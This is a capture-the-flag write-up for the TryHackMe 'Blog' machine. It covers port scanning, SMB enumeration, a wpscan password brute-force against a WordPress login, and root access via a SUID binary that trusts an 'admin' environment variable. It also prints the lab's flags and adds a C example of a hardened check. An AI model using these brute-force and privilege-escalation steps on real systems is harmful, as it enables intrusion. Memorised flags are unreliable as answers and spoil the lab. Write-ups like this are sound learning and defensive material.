Blog
Lab Setup
mkdir ~/Documents/TryHackMe/eJPT/Blog
cd ~/Documents/TryHackMe/eJPT/Blog
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.245.192
export URL=http://$IP
Enumeration
To set up a domain for the room, the author recommends adding "blog.thm" to the /etc/hosts file. This step is needed so that the machine is reachable under its designated hostname.
To begin, perform a comprehensive scan of the machine's open ports using both rustscan and nmap. Using both tools gives a more thorough picture of the available services and potential vulnerabilities.
nmap
nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp
rustscan
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Before accessing the website, I try to get some information about shares using the enum4linux tool.
enum4linux $IP

smbclient -N //$IP/BillySMB
I downloaded three files, but they didn't contain useful information. Now, I'm moving on to check the website to see if there's anything there that could help.
We already found a user, so I use wpscan to brute-force the password for this user. After minutes of waiting I got nothing, so I enumerated users instead and found another one -> kwheel
wpscan --url http://blog.thm/wp-login.php/ --passwords ~/Documents/rockyou.txt --usernames kwheel
Found the password for the kwheel user.

Exploitation
In the room description, there's a crucial clue pointing to a specific CVE that we need to leverage. This information is key to advancing in the challenge.
There are two ways to do this machine: a standalone script or the Metasploit framework.
I got access to the machine and, after a lot of enumeration, found a file with the SUID bit set -> /usr/sbin/checker
Let's download the file and employ reverse engineering tools and techniques to understand its functionality.

Upon examining the source code, it appears that setting the environment variable "admin" to 0 grants root privileges when the binary is executed. To proceed, simply export "admin" as 0 before running it. This should elevate the privileges as intended.
www-data@blog:/usr/sbin$ ./checker
./checker
Not an Admin
www-data@blog:/usr/sbin$ export admin='0'
export admin='0'
www-data@blog:/usr/sbin$ ./checker
./checker
root@blog:/usr/sbin# whoami
whoami
root
root@blog:/usr/sbin# cd /media
cd /media
root@blog:/media# cd usb
cd usb
root@blog:/media/usb# ls
ls
user.txt
root@blog:/media/usb# cat user.txt
cat user.txt
c8421899aae571f7af486492b71a8ab7
root@blog:/media/usb# cd /root
cd /root
root@blog:/root# ls
ls
root.txt
root@blog:/root# cat root.txt
cat root.txt
9a0b2b618bef9bfa7ac28c1353d9f318
root@blog:/root#
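As an added example (not the room's checker source, which this writeup does not reproduce), the snippet below shows the decision pattern described above beside a hardened form: the environment variable name "admin" comes from the writeup, the function names are mine, and clearenv() assumes glibc/Linux.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Constructed illustration of the flaw the writeup describes, not the
 * room's actual checker source: a SUID binary that takes its privilege
 * decision from an environment variable. Whoever runs the binary controls
 * its environment, so this check grants "admin" to anyone. */
int insecure_is_admin(void)
{
    const char *admin = getenv("admin");
    return admin != NULL && strcmp(admin, "0") == 0;
}

/* Hardened decision: use only the real uid the kernel reports for the
 * caller. Unlike an environment variable, it cannot be set by the caller. */
int hardened_is_admin(uid_t real_uid)
{
    return real_uid == 0;
}

/* Hardened entry point for a privileged helper: discard the inherited
 * environment before doing anything else (clearenv is glibc/Linux), install
 * a minimal known-good PATH, then decide on getuid(). Returns 1 if the
 * caller may act as admin, 0 otherwise. */
int hardened_checker(void)
{
    clearenv();
    setenv("PATH", "/usr/bin:/bin", 1);
    return hardened_is_admin(getuid());
}

int main(void)
{
    setenv("admin", "0", 1); /* the same export the writeup uses */
    printf("insecure check: %s\n", insecure_is_admin() ? "Admin" : "Not an Admin");
    printf("hardened check: %s\n", hardened_checker() ? "Admin" : "Not an Admin");
    return 0;
}
```

Run as an unprivileged user, the insecure check reports "Admin" while the hardened check reports "Not an Admin", because the latter never consults the environment.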